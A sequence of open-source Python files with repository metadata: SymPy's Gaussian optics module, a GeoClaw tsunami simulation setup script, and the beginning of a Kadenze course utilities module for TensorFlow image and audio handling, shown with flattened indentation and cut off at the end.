[(n1 - n2)/(R*n2), n1/n2]
"""
def __new__(cls, R, n1, n2):
R, n1 , n2 = sympify((R, n1, n2))
return RayTransferMatrix.__new__(cls, 1, 0, (n1-n2)/R/n2, n1/n2)
class FlatMirror(RayTransferMatrix):
"""
Ray Transfer Matrix for reflection.
See Also
========
RayTransferMatrix
Examples
========
>>> from sympy.physics.gaussopt import FlatMirror
>>> FlatMirror()
[1, 0]
[0, 1]
"""
def __new__(cls):
return RayTransferMatrix.__new__(cls, 1, 0, 0, 1)
class CurvedMirror(RayTransferMatrix):
"""
Ray Transfer Matrix for reflection from curved surface.
Parameters
==========
R : radius of curvature (positive for concave)
See Also
========
RayTransferMatrix
Examples
========
>>> from sympy.physics.gaussopt import CurvedMirror
>>> from sympy import symbols
>>> R = symbols('R')
>>> CurvedMirror(R)
[ 1, 0]
[-2/R, 1]
"""
def __new__(cls, R):
R = sympify(R)
return RayTransferMatrix.__new__(cls, 1, 0, -2/R, 1)
class ThinLens(RayTransferMatrix):
"""
Ray Transfer Matrix for a thin lens.
Parameters
==========
f : the focal distance
See Also
========
RayTransferMatrix
Examples
========
>>> from sympy.physics.gaussopt import ThinLens
>>> from sympy import symbols
>>> f = symbols('f')
>>> ThinLens(f)
[ 1, 0]
[-1/f, 1]
"""
def __new__(cls, f):
f = sympify(f)
return RayTransferMatrix.__new__(cls, 1, 0, -1/f, 1)
###
# Representation for geometric ray
###
class GeometricRay(Matrix):
"""
Representation for a geometric ray in the Ray Transfer Matrix formalism.
Parameters
==========
h : height, and
angle : angle, or
matrix : a 2x1 matrix (Matrix(2, 1, [height, angle]))
Examples
=======
>>> from sympy.physics.gaussopt import GeometricRay, FreeSpace
>>> from sympy import symbols, Matrix
>>> d, h, angle = symbols('d, h, angle')
>>> GeometricRay(h, angle)
[ h]
[angle]
>>> FreeSpace(d)*GeometricRay(h, angle)
[angle*d + h]
[ angle]
>>> GeometricRay( Matrix( ((h,), (angle,)) ) )
[ h]
[angle]
See Also
========
RayTransferMatrix
"""
def __new__(cls, *args):
if len(args) == 1 and isinstance(args[0], Matrix) \
and args[0].shape == (2, 1):
temp = args[0]
elif len(args) == 2:
temp = ((args[0],), (args[1],))
else:
raise ValueError(filldedent('''
Expecting 2x1 Matrix or the 2 elements of
the Matrix but got %s''' % str(args)))
return Matrix.__new__(cls, temp)
@property
def height(self):
"""
The distance from the optical axis.
Examples
========
>>> from sympy.physics.gaussopt import GeometricRay
>>> from sympy import symbols
>>> h, angle = symbols('h, angle')
>>> gRay = GeometricRay(h, angle)
>>> gRay.height
h
"""
return self[0]
@property
def angle(self):
"""
The angle with the optical axis.
Examples
========
>>> from sympy.physics.gaussopt import GeometricRay
>>> from sympy import symbols
>>> h, angle = symbols('h, angle')
>>> gRay = GeometricRay(h, angle)
>>> gRay.angle
angle
"""
return self[1]
###
# Representation for gauss beam
###
class BeamParameter(Expr):
"""
Representation for a gaussian ray in the Ray Transfer Matrix formalism.
Parameters
==========
wavelen : the wavelength,
z : the distance to waist, and
w : the waist, or
z_r : the rayleigh range
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.q
1 + 1.88679245283019*I*pi
>>> p.q.n()
1.0 + 5.92753330865999*I
>>> p.w_0.n()
0.00100000000000000
>>> p.z_r.n()
5.92753330865999
>>> from sympy.physics.gaussopt import FreeSpace
>>> fs = FreeSpace(10)
>>> p1 = fs*p
>>> p.w.n()
0.00101413072159615
>>> p1.w.n()
0.00210803120913829
See Also
========
RayTransferMatrix
References
==========
[1] http://en.wikipedia.org/wiki/Complex_beam_parameter
"""
#TODO A class Complex may be implemented. The BeamParameter may
# subclass it. See:
# https://groups.google.com/d/topic/sympy/7XkU07NRBEs/discussion
__slots__ = ['z', 'z_r', 'wavelen']
def __new__(cls, wavelen, z, **kwargs):
wavelen, z = sympify((wavelen, z))
inst = Expr.__new__(cls, wavelen, z)
inst.wavelen = wavelen
inst.z = z
if len(kwargs) !=1:
raise ValueError('Constructor expects exactly one named argument.')
elif 'z_r' in kwargs:
inst.z_r = sympify(kwargs['z_r'])
elif 'w' in kwargs:
inst.z_r = waist2rayleigh(sympify(kwargs['w']), wavelen)
else:
raise ValueError('The constructor needs named argument w or z_r')
return inst
@property
def q(self):
"""
The complex parameter representing the beam.
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.q
1 + 1.88679245283019*I*pi
"""
return self.z + I*self.z_r
@property
def radius(self):
"""
The radius of curvature of the phase front.
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.radius
0.2809/pi**2 + 1
"""
return self.z*(1+(self.z/self.z_r)**2)
@property
def w(self):
"""
The beam radius at `1/e^2` intensity.
See Also
========
w_0 : the minimal radius of beam
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.w
0.001*sqrt(0.2809/pi**2 + 1)
"""
return self.w_0*sqrt(1+(self.z/self.z_r)**2)
@property
def w_0(self):
"""
The beam waist (minimal radius).
See Also
========
w : the beam radius at `1/e^2` intensity
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.w_0
0.00100000000000000
"""
return sqrt(self.z_r/pi*self.wavelen)
@property
def divergence(self):
"""
Half of the total angular spread.
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.divergence
0.00053/pi
"""
return self.wavelen/pi/self.w_0
@property
def gouy(self):
"""
The Gouy phase.
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.gouy
atan(0.53/pi)
"""
return atan2(self.z, self.z_r)
@property
def waist_approximation_limit(self):
"""
The minimal waist for which the gauss beam approximation is valid.
The gauss beam is a solution to the paraxial equation. For curvatures
that are too great it is not a valid approximation.
Examples
========
>>> from sympy.physics.gaussopt import BeamParameter
>>> p = BeamParameter(530e-9, 1, w=1e-3)
>>> p.waist_approximation_limit
1.06e-6/pi
"""
return 2*self.wavelen/pi
###
# Utilities
###
def waist2rayleigh(w, wavelen):
"""
Calculate the rayleigh range from the waist of a gaussian beam.
See Also
========
rayleigh2waist, BeamParameter
Examples
========
>>> from sympy.physics.gaussopt import waist2rayleigh
>>> from sympy import symbols
>>> w, wavelen = symbols('w wavelen')
>>> waist2rayleigh(w, wavelen)
pi*w**2/wavelen
"""
w, wavelen = sympify((w, wavelen))
return w**2*pi/wavelen
def rayleigh2waist(z_r, wavelen):
"""Calculate the waist from the rayleigh range of a gaussian beam.
See Also
========
waist2rayleigh, BeamParameter
Examples
========
>>> from sympy.physics.gaussopt import rayleigh2waist
>>> from sympy import symbols
>>> z_r, wavelen = symbols('z_r wavelen')
>>> rayleigh2waist(z_r, wavelen)
sqrt(wavelen*z_r)/sqrt(pi)
"""
z_r, wavelen = sympify((z_r, wavelen))
return sqrt(z_r/pi*wavelen)
def geometric_conj_ab(a, b):
"""
Conjugation relation for geometrical beams under paraxial conditions.
Takes the distances to the optical element and returns the needed
focal distance.
See Also
========
geometric_conj_af, geometric_conj_bf
Examples
========
>>> from sympy.physics.gaussopt import geometric_conj_ab
>>> from sympy import symbols
>>> a, b = symbols('a b')
>>> geometric_conj_ab(a, b)
a*b/(a + b)
"""
a, b = sympify((a, b))
if abs(a) == oo or abs(b) == oo:
return a if abs(b) == oo else b
else:
return a*b/(a+b)
def geometric_conj_af(a, f):
"""
Conjugation relation for geometrical beams under paraxial conditions.
Takes the object distance (for geometric_conj_af) or the image distance
(for geometric_conj_bf) to the optical element and the focal distance.
Then it returns the other distance needed for conjugation.
See Also
========
geometric_conj_ab
Examples
========
>>> from sympy.physics.gaussopt import geometric_conj_af, geometric_conj_bf
>>> from sympy import symbols
>>> a, b, f = symbols('a b f')
>>> geometric_conj_af(a, f)
a*f/(a - f)
>>> geometric_conj_bf(b, f)
b*f/(b - f)
"""
a, f = sympify((a, f))
return -geometric_conj_ab(a, -f)
geometric_conj_bf = geometric_conj_af
def gaussian_conj(s_in, z_r_in, f):
"""
Conjugation relation for gaussian beams.
Parameters
==========
s_in : the distance to optical element from the waist
z_r_in : the rayleigh range of the incident beam
f : the focal length of the optical element
Returns
=======
a tuple containing (s_out, z_r_out, m)
s_out : the distance between the new waist and the optical element
z_r_out : the rayleigh range of the emergent beam
m : the ration between the new and the old waists
Examples
========
>>> from sympy.physics.gaussopt import gaussian_conj
>>> from sympy import symbols
>>> s_in, z_r_in, f = symbols('s_in z_r_in f')
>>> gaussian_conj(s_in, z_r_in, f)[0]
1/(-1/(s_in + z_r_in**2/(-f + s_in)) + 1/f)
>>> gaussian_conj(s_in, z_r_in, f)[1]
z_r_in/(1 - s_in**2/f**2 + z_r_in**2/f**2)
>>> gaussian_conj(s_in, z_r_in, f)[2]
1/sqrt(1 - s_in**2/f**2 + z_r_in**2/f**2)
"""
s_in, z_r_in, f = sympify((s_in, z_r_in, f))
s_out = 1 / ( -1/(s_in + z_r_in**2/(s_in-f)) + 1/f )
m = 1/sqrt((1-(s_in/f)**2) + (z_r_in/f)**2)
z_r_out = z_r_in / ((1-(s_in/f)**2) + (z_r_in/f)**2)
return (s_out, z_r_out, m)
def conjugate_gauss_beams(wavelen, waist_in, waist_out, **kwargs):
"""
Find the optical setup conjugating the object/image waists.
Parameters
==========
wavelen : the wavelength of the beam
waist_in and waist_out : the waists to be conjugated
f : the focal distance of the element used in the conjugation
Returns
=======
a tuple containing (s_in, s_out, f)
s_in : the distance before the optical element
s_out : the distance after the optical element
f : the focal distance of the optical element
Examples
========
>>> from sympy.physics.gaussopt import conjugate_gauss_beams
>>> from sympy import symbols, factor
>>> l, w_i, w_o, f = symbols('l w_i w_o f')
>>> conjugate_gauss_beams(l, w_i, w_o, f=f)[0]
f*(-sqrt(w_i**2/w_o**2 - pi**2*w_i**4/(f**2*l**2)) + 1)
>>> factor(conjugate_gauss_beams(l, w_i, w_o, f=f)[1])
f*w_o**2*(w_i**2/w_o**2 - sqrt(w_i**2/w_o**2 - pi**2*w_i**4/(f**2*l**2)))/w_i**2
>>> conjugate_gauss_beams(l, w_i, w_o, f=f)[2]
f
"""
#TODO add the other possible arguments
wavelen, waist_in, waist_out = sympify((wavelen, waist_in, waist_out))
m = waist_out / waist_in
z = waist2rayleigh(waist_in, wavelen)
if len(kwargs) != 1:
raise ValueError("The function expects only one named argument")
elif 'dist' in kwargs:
raise NotImplementedError(filldedent('''
Currently only focal length is supported as a parameter'''))
elif 'f' in kwargs:
f = sympify(kwargs['f'])
s_in = f * (1 - sqrt(1/m**2 - z**2/f**2))
s_out = gaussian_conj(s_in, z, f)[0]
elif 's_in' in kwargs:
raise NotImplementedError(filldedent('''
Currently only focal length is supported as a parameter'''))
else:
raise ValueError(filldedent('''
The functions expects the focal length as a named argument'''))
return (s_in, s_out, f)
#TODO
#def plot_beam():
# """Plot the beam radius as it propagates in space."""
# pass
#TODO
#def plot_beam_conjugation():
# """
# Plot the intersection of two beams.
#
# Represents the conjugation relation.
#
# See Also
# ========
#
# conjugate_gauss_beams
# """
# pass
| flacjacket/sympy | sympy/physics/gaussopt.py | Python | bsd-3-clause | 19,362 | [
"Gaussian"
] | e94939d7ae72d8d02d6b609d7029aa08557c2f35953b832b405a775c7caf1ffc |
"""
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
t_shelf = 3.2*3600 # time approaching continental slope
t_harbor = 3.5*3600 # time approaching harbor
try:
CLAW = os.environ['CLAW']
except:
raise Exception("*** Must first set CLAW enviornment variable")
# Scratch directory for storing topo and dtopo files:
scratch_dir = os.path.join(CLAW, 'geoclaw', 'scratch')
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
"""
Define the parameters used for running Clawpack.
INPUT:
claw_pkg expected to be "geoclaw" for this setrun.
OUTPUT:
rundata - object of class ClawRunData
"""
from clawpack.clawutil import data
assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
num_dim = 2
rundata = data.ClawRunData(claw_pkg, num_dim)
#------------------------------------------------------------------
# GeoClaw specific parameters:
#------------------------------------------------------------------
rundata = setgeo(rundata)
#------------------------------------------------------------------
# Adjoint specific data:
#------------------------------------------------------------------
rundata = setadjoint(rundata)
#------------------------------------------------------------------
# Standard Clawpack parameters to be written to claw.data:
#------------------------------------------------------------------
clawdata = rundata.clawdata # initialized when rundata instantiated
# Set single grid parameters first.
# See below for AMR parameters.
# ---------------
# Spatial domain:
# ---------------
# Number of space dimensions:
clawdata.num_dim = num_dim
# Lower and upper edge of computational domain:
clawdata.lower[0] = 140.0 # xlower
clawdata.upper[0] = 250.0 # xupper
clawdata.lower[1] = 10.0 # ylower
clawdata.upper[1] = 62.0 # yupper
# Number of grid cells:
clawdata.num_cells[0] = 110 # mx
clawdata.num_cells[1] = 52 # my
# ---------------
# Size of system:
# ---------------
# Number of equations in the system:
clawdata.num_eqn = 3
# Number of auxiliary variables in the aux array (initialized in setaux)
clawdata.num_aux = 3
# Index of aux array corresponding to capacity function, if there is one:
clawdata.capa_index = 2
# -------------
# Initial time:
# -------------
clawdata.t0 = 0.0
# Restart from checkpoint file of a previous run?
# Note: If restarting, you must also change the Makefile to set:
# RESTART = True
# If restarting, t0 above should be from original run, and the
# restart_file 'fort.chkNNNNN' specified below should be in
# the OUTDIR indicated in Makefile.
clawdata.restart = False # True to restart from prior results
clawdata.restart_file = 'fort.chk00006' # File to use for restart data
# -------------
# Output times:
#--------------
# Specify at what times the results should be written to fort.q files.
# Note that the time integration stops after the final output time.
clawdata.output_style = 1
if clawdata.output_style==1:
# Output ntimes frames at equally spaced times up to tfinal:
# Can specify num_output_times = 0 for no output
clawdata.num_output_times = 22
clawdata.tfinal = 11*3600.
clawdata.output_t0 = False # output at initial (or restart) time?
elif clawdata.output_style == 2:
# Specify a list or numpy array of output times:
# Include t0 if you want output at the initial time.
clawdata.output_times = list(np.linspace(3600,3600*9,9))
elif clawdata.output_style == 3:
# Output every step_interval timesteps over total_steps timesteps:
clawdata.output_step_interval = 1
clawdata.total_steps = 1
clawdata.output_t0 = True # output at initial (or restart) time?
clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
clawdata.output_q_components = 'all' # could be list such as [True,True]
clawdata.output_aux_components = 'none' # could be list
clawdata.output_aux_onlyonce = True # output aux arrays only at t0
# ---------------------------------------------------
# Verbosity of messages to screen during integration:
# ---------------------------------------------------
# The current t, dt, and cfl will be printed every time step
# at AMR levels <= verbosity. Set verbosity = 0 for no printing.
# (E.g. verbosity == 2 means print only on levels 1 and 2.)
clawdata.verbosity = 0
# --------------
# Time stepping:
# --------------
# if dt_variable==True: variable time steps used based on cfl_desired,
# if dt_variable==Falseixed time steps dt = dt_initial always used.
clawdata.dt_variable = True
# Initial time step for variable dt.
# (If dt_variable==0 then dt=dt_initial for all steps)
clawdata.dt_initial = 1
# Max time step to be allowed if variable dt used:
clawdata.dt_max = 1e+99
# Desired Courant number if variable dt used
clawdata.cfl_desired = 0.75
# max Courant number to allow without retaking step with a smaller dt:
clawdata.cfl_max = 1.0
# Maximum number of time steps to allow between output times:
clawdata.steps_max = 5000
# ------------------
# Method to be used:
# ------------------
# Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
clawdata.order = 2
# Use dimensional splitting? (not yet available for AMR)
clawdata.dimensional_split = 'unsplit'
# For unsplit method, transverse_waves can be
# 0 or 'none' ==> donor cell (only normal solver used)
# 1 or 'increment' ==> corner transport of waves
# 2 or 'all' ==> corner transport of 2nd order corrections too
clawdata.transverse_waves = 2
# Number of waves in the Riemann solution:
clawdata.num_waves = 3
# List of limiters to use for each wave family:
# Required: len(limiter) == num_waves
# Some options:
# 0 or 'none' ==> no limiter (Lax-Wendroff)
# 1 or 'minmod' ==> minmod
# 2 or 'superbee' ==> superbee
# 3 or 'vanleer' ==> van Leer
# 4 or 'mc' ==> MC limiter
clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
# Source terms splitting:
# src_split == 0 or 'none' ==> no source term (src routine never called)
# src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
# src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
clawdata.source_split = 1
# --------------------
# Boundary conditions:
# --------------------
# Number of ghost cells (usually 2)
clawdata.num_ghost = 2
# Choice of BCs at xlower and xupper:
# 0 or 'user' => user specified (must modify bcNamr.f to use this option)
# 1 or 'extrap' => extrapolation (non-reflecting outflow)
# 2 or 'periodic' => periodic (must specify this at both boundaries)
# 3 or 'wall' => solid wall for systems where q(2) is normal velocity
clawdata.bc_lower[0] = 'extrap' # at xlower
clawdata.bc_upper[0] = 'extrap' # at xupper
clawdata.bc_lower[1] = 'extrap' # at ylower
clawdata.bc_upper[1] = 'extrap' # at yupper
# ---------------
# gauges:
# ---------------
gauges = rundata.gaugedata.gauges
# for gauges append lines of the form [gaugeno, x, y, t1, t2]
# Outside harbor:
gauges.append([1, 235.536, 41.67, t_shelf, 1.e10])
# Inside harbor:
gauges.append([2, 235.80917,41.74111,t_harbor, 1.e10])
# --------------
# Checkpointing:
# --------------
# Specify when checkpoint files should be created that can be
# used to restart a computation.
clawdata.checkpt_style = 0
if clawdata.checkpt_style == 0:
# Do not checkpoint at all
pass
elif clawdata.checkpt_style == 1:
# Checkpoint only at tfinal.
pass
elif clawdata.checkpt_style == 2:
# Specify a list of checkpoint times.
clawdata.checkpt_times = [0.1,0.15]
elif clawdata.checkpt_style == 3:
# Checkpoint every checkpt_interval timesteps (on Level 1)
# and at the final time.
clawdata.checkpt_interval = 5
# ---------------
# AMR parameters: (written to amr.data)
# ---------------
amrdata = rundata.amrdata
# max number of refinement levels:
amrdata.amr_levels_max = 4
# List of refinement ratios at each level (length at least amr_level_max-1)
amrdata.refinement_ratios_x = [5, 6, 6, 3, 30]
amrdata.refinement_ratios_y = [5, 6, 6, 3, 30]
amrdata.refinement_ratios_t = [5, 6, 6, 3, 4]
# Specify type of each aux variable in amrdata.auxtype.
# This must be a list of length num_aux, each element of which is one of:
# 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
amrdata.aux_type = ['center', 'capacity', 'yleft']
# Flag for refinement based on Richardson error estimater:
amrdata.flag_richardson = False # use Richardson?
amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
# Flag for refinement using routine flag2refine:
amrdata.flag2refine = True # use this?
amrdata.flag2refine_tol = 0.004 # tolerance used in this routine
# Note: this tolerance is not used in the surface-flagging method
# only the wave_tolerance is used (a geoclaw specific parameters)
# steps to take on each level L between regriddings of level L+1:
amrdata.regrid_interval = 3
# width of buffer zone around flagged points:
# (typically the same as regrid_interval so waves don't escape):
amrdata.regrid_buffer_width = 2
# clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
# (closer to 1.0 => more small grids may be needed to cover flagged cells)
amrdata.clustering_cutoff = 0.7
# print info about each regridding up to this level:
amrdata.verbosity_regrid = 0
# ---------------
# Regions:
# ---------------
regions = rundata.regiondata.regions
# to specify regions of refinement append lines of the form
# [minlevel,maxlevel,t1,t2,x1,x2,y1,y2]
regions.append([1, 1, 0., 1e9, 0, 360, -90, 90]) #whole world
regions.append([1, 3, 0., 7*3600., 0, 360, -90, 90]) #whole world
regions.append([1, 3, 7*3600.,10*3600., 170., 360, 18, 90])
regions.append([1, 3, 10*3600.,1e9, 195., 360, -90, 90])
regions.append([4, 4, 0., 1800, 175, 195, 50, 54]) #earthquake source AASZ04
regions.append([3, 4, t_shelf, 1e9, 235, 238, 34, 43]) # between shelf and CC
regions.append([4, 4, t_shelf, 1e9, 235, 236, 41, 42])
regions.append([5, 5, t_shelf, 1e9, 235.5,235.83,41.6,41.8]) #only harbor
regions.append([5, 6, t_harbor, 1e9, 235.78,235.84,41.735,41.775]) #only harbor
# ----- For developers -----
# Toggle debugging print statements:
amrdata.dprint = False # print domain flags
amrdata.eprint = False # print err est flags
amrdata.edebug = False # even more err est flags
amrdata.gprint = False # grid bisection/clustering
amrdata.nprint = False # proper nesting output
amrdata.pprint = False # proj. of tagged points
amrdata.rprint = False # print regridding summary
amrdata.sprint = False # space/memory output
amrdata.tprint = False # time step reporting each level
amrdata.uprint = False # update/upbnd reporting
return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367500.0
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
tide_stage = 77.
geo_data.sea_level = (tide_stage - 77.)/100. # m relative to MHW
geo_data.dry_tolerance = 0.001
geo_data.friction_forcing = True
geo_data.manning_coefficient = 0.025
geo_data.friction_depth = 100.0
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.09
refinement_data.deep_depth = 100.0
refinement_data.max_level_deep = 4
# == settopo.data values ==
topofiles = rundata.topo_data.topofiles
# for topography, append lines of the form
# [topotype, minlevel, maxlevel, t1, t2, fname]
topofiles.append([3, 1, 1, 0., 1.e10, \
scratch_dir + '/etopo1min170E124W40N61N.asc'])
topofiles.append([3, 1, 1, 0., 1.e10, \
scratch_dir + '/etopo4min120E110W0N62N.asc'])
topofiles.append([-3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1sec-c.asc'])
topofiles.append([3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1_3sec-c_pierless.asc'])
# == setdtopo.data values ==
rundata.dtopo_data.dtopofiles = []
dtopofiles = rundata.dtopo_data.dtopofiles
# for moving topography, append lines of the form :
# [topotype, minlevel,maxlevel,fname]
dtopodir = scratch_dir + '/'
dtopotype = 3
fname = dtopodir + 'AASZ04v2.tt3'
dtopofiles.append([dtopotype, 3, 3, fname])
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
qinitfiles = rundata.qinit_data.qinitfiles
# for qinit perturbations, append lines of the form: (<= 1 allowed for now!)
# [minlev, maxlev, fname]
# == fixedgrids.data values ==
rundata.fixed_grid_data.fixedgrids = []
fixedgrids = rundata.fixed_grid_data.fixedgrids
# for fixed grids append lines of the form
# [t1,t2,noutput,x1,x2,y1,y2,xpoints,ypoints,\
# ioutarrivaltimes,ioutsurfacemax]
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
return rundata
# end of function setgeo
# ----------------------
#-------------------
def setadjoint(rundata):
#-------------------
"""
Reading in all of the checkpointed Adjoint files
"""
import glob
files = glob.glob("adjoint/_output/fort.tck*")
files.sort()
probdata = rundata.new_UserData(name='adjointdata',fname='adjoint.data')
probdata.add_param('numadjoints', len(files), 'Number of adjoint checkpoint files.')
counter = 1
for fname in files:
f = open(fname)
time = f.readline().split()[-1]
fname = '../' + fname.replace('tck','chk')
probdata.add_param('file' + str(counter), fname, 'Checkpoint file' + str(counter))
probdata.add_param('time' + str(counter), float(time), 'Time for file' + str(counter))
counter = counter + 1
return rundata
# end of function setadjoint
# ----------------------
if __name__ == '__main__':
# Set up run-time parameters and write all data files.
import sys
rundata = setrun(*sys.argv[1:])
rundata.write()
| clawpack/adjoint | paper1_examples/tsunami_Alaska/compare/setrun_sflag_lowtol.py | Python | bsd-2-clause | 16,061 | [
"NetCDF"
] | e2ebf51f70089a6c7017e00be3f7a99e9239f3b04b97342c3e971c1e0794c060 |
"""Utilities used in the Kadenze Academy Course on Deep Learning w/ Tensorflow.
Creative Applications of Deep Learning w/ Tensorflow.
Kadenze, Inc.
Parag K. Mital
Copyright Parag K. Mital, June 2016.
"""
import matplotlib.pyplot as plt
import tensorflow as tf
import urllib
import numpy as np
import zipfile
import os
from scipy.io import wavfile
def download(path):
"""Use urllib to download a file.
Parameters
----------
path : str
Url to download
Returns
-------
path : str
Location of downloaded file.
"""
import os
from six.moves import urllib
fname = path.split('/')[-1]
if os.path.exists(fname):
return fname
print('Downloading ' + path)
def progress(count, block_size, total_size):
if count % 20 == 0:
print('Downloaded %02.02f/%02.02f MB' % (
count * block_size / 1024.0 / 1024.0,
total_size / 1024.0 / 1024.0), end='\r')
filepath, _ = urllib.request.urlretrieve(
path, filename=fname, reporthook=progress)
return filepath
def download_and_extract_tar(path, dst):
"""Download and extract a tar file.
Parameters
----------
path : str
Url to tar file to download.
dst : str
Location to save tar file contents.
"""
import tarfile
filepath = download(path)
if not os.path.exists(dst):
os.makedirs(dst)
tarfile.open(filepath, 'r:gz').extractall(dst)
def download_and_extract_zip(path, dst):
"""Download and extract a zip file.
Parameters
----------
path : str
Url to zip file to download.
dst : str
Location to save zip file contents.
"""
import zipfile
filepath = download(path)
if not os.path.exists(dst):
os.makedirs(dst)
zf = zipfile.ZipFile(file=filepath)
zf.extractall(dst)
def load_audio(filename, b_normalize=True):
"""Load the audiofile at the provided filename using scipy.io.wavfile.
Optionally normalizes the audio to the maximum value.
Parameters
----------
filename : str
File to load.
b_normalize : bool, optional
Normalize to the maximum value.
"""
sr, s = wavfile.read(filename)
if b_normalize:
s = s.astype(np.float32)
s = (s / np.max(np.abs(s)))
s -= np.mean(s)
return s
def corrupt(x):
"""Take an input tensor and add uniform masking.
Parameters
----------
x : Tensor/Placeholder
Input to corrupt.
Returns
-------
x_corrupted : Tensor
50 pct of values corrupted.
"""
return tf.multiply(x, tf.cast(tf.random_uniform(shape=tf.shape(x),
minval=0,
maxval=2,
dtype=tf.int32), tf.float32))
def interp(l, r, n_samples):
"""Intepolate between the arrays l and r, n_samples times.
Parameters
----------
l : np.ndarray
Left edge
r : np.ndarray
Right edge
n_samples : int
Number of samples
Returns
-------
arr : np.ndarray
Inteporalted array
"""
return np.array([
l + step_i / (n_samples - 1) * (r - l)
for step_i in range(n_samples)])
def make_latent_manifold(corners, n_samples):
"""Create a 2d manifold out of the provided corners: n_samples * n_samples.
Parameters
----------
corners : list of np.ndarray
The four corners to intepolate.
n_samples : int
Number of samples to use in interpolation.
Returns
-------
arr : np.ndarray
Stacked array of all 2D interpolated samples
"""
left = interp(corners[0], corners[1], n_samples)
right = interp(corners[2], corners[3], n_samples)
embedding = []
for row_i in range(n_samples):
embedding.append(interp(left[row_i], right[row_i], n_samples))
return np.vstack(embedding)
def imcrop_tosquare(img):
"""Make any image a square image.
Parameters
----------
img : np.ndarray
Input image to crop, assumed at least 2d.
Returns
-------
crop : np.ndarray
Cropped image.
"""
size = np.min(img.shape[:2])
extra = img.shape[:2] - size
crop = img
for i in np.flatnonzero(extra):
crop = np.take(crop, extra[i] // 2 + np.r_[:size], axis=i)
return crop
def slice_montage(montage, img_h, img_w, n_imgs):
"""Slice a montage image into n_img h x w images.
Performs the opposite of the montage function. Takes a montage image and
slices it back into a N x H x W x C image.
Parameters
----------
montage : np.ndarray
Montage image to slice.
img_h : int
Height of sliced image
img_w : int
Width of sliced image
n_imgs : int
Number of images to slice
Returns
-------
sliced : np.ndarray
Sliced images as 4d array.
"""
sliced_ds = []
for i in range(int(np.sqrt(n_imgs))):
for j in range(int(np.sqrt(n_imgs))):
sliced_ds.append(montage[
1 + i + i * img_h:1 + i + (i + 1) * img_h,
1 + j + j * img_w:1 + j + (j + 1) * img_w])
return np.array(sliced_ds)
def montage(images, saveto='montage.png'):
"""Draw all images as a montage separated by 1 pixel borders.
Also saves the file to the destination specified by `saveto`.
Parameters
----------
images : numpy.ndarray
Input array to create montage of. Array should be:
batch x height x width x channels.
saveto : str
Location to save the resulting montage image.
Returns
-------
m : numpy.ndarray
Montage image.
"""
if isinstance(images, list):
images = np.array(images)
img_h = images.shape[1]
img_w = images.shape[2]
n_plots = int(np.ceil(np.sqrt(images.shape[0])))
if len(images.shape) == 4 and images.shape[3] == 3:
m = np.ones(
(images.shape[1] * n_plots + n_plots + 1,
images.shape[2] * n_plots + n_plots + 1, 3)) * 0.5
else:
m = np.ones(
(images.shape[1] * n_plots + n_plots + 1,
images.shape[2] * n_plots + n_plots + 1)) * 0.5
for i in range(n_plots):
for j in range(n_plots):
this_filter = i * n_plots + j
if this_filter < images.shape[0]:
this_img = images[this_filter]
m[1 + i + i * img_h:1 + i + (i + 1) * img_h,
1 + j + j * img_w:1 + j + (j + 1) * img_w] = this_img
plt.imsave(arr=m, fname=saveto)
return m
def montage_filters(W):
"""Draws all filters (n_input * n_output filters) as a
montage image separated by 1 pixel borders.
Parameters
----------
W : Tensor
Input tensor to create montage of.
Returns
-------
m : numpy.ndarray
Montage image.
"""
W = np.reshape(W, [W.shape[0], W.shape[1], 1, W.shape[2] * W.shape[3]])
n_plots = int(np.ceil(np.sqrt(W.shape[-1])))
m = np.ones(
(W.shape[0] * n_plots + n_plots + 1,
W.shape[1] * n_plots + n_plots + 1)) * 0.5
for i in range(n_plots):
for j in range(n_plots):
this_filter = i * n_plots + j
if this_filter < W.shape[-1]:
m[1 + i + i * W.shape[0]:1 + i + (i + 1) * W.shape[0],
1 + j + j * W.shape[1]:1 + j + (j + 1) * W.shape[1]] = (
np.squeeze(W[:, :, :, this_filter]))
return m
def get_celeb_files(dst='img_align_celeba', max_images=100):
"""Download the first 100 images of the celeb dataset.
Files will be placed in a directory 'img_align_celeba' if one
doesn't exist.
Returns
-------
files : list of strings
Locations to the first 100 images of the celeb net dataset.
"""
# Create a directory
